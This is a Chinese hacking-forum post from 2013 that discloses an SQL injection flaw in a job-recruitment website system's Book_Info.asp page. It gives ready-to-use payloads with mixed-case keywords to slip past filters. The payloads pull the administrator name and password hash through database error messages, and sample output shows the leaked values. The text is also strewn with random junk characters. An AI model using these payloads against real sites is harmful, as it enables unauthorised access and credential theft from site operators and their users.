找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2245|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp 7 d. J9 r! j8 r
  Y3 k2 |4 c7 t! s( C+ u
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出8 \2 M. `3 q2 x1 S

% h! ~7 Y" Y  v3 m; yexp:如下
" R; J9 ~9 F/ j0 e3 l$ K+ z查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)- M+ a1 u3 D5 k; t
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
3 J7 v& I5 S9 W
0 [' e! l2 g6 L  o- @http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)- D* l( }& ~$ `$ u/ t3 J

2 Z5 @9 E1 W7 B' j+ oMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'& Q; I3 w" a% a' U1 Y
% L% b& u3 c* W+ Z7 h
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。0 c( x/ [6 k+ F* p" V& J
; l4 U8 J' V- U1 ^' L
/Educate/Book_Info.asp,行 82 v1 c  m. h/ K3 d; ?3 X9 ?
* _& X) _3 c# D4 F9 |* V
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)! Q4 V# U# D- u6 ~1 O8 B
& q& I% P4 D5 ]% ?' l
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
) F( x& n# w6 V! g5 @" p; q9 Q* @* y
, a8 V5 C" I6 s: ]- K将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。! _6 R0 N4 f$ ]* a* ]

- u+ K8 E* j  p4 R+ a8 D1 e; G" U/Educate/Book_Info.asp,行 8* a$ {% j! Q  c& S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表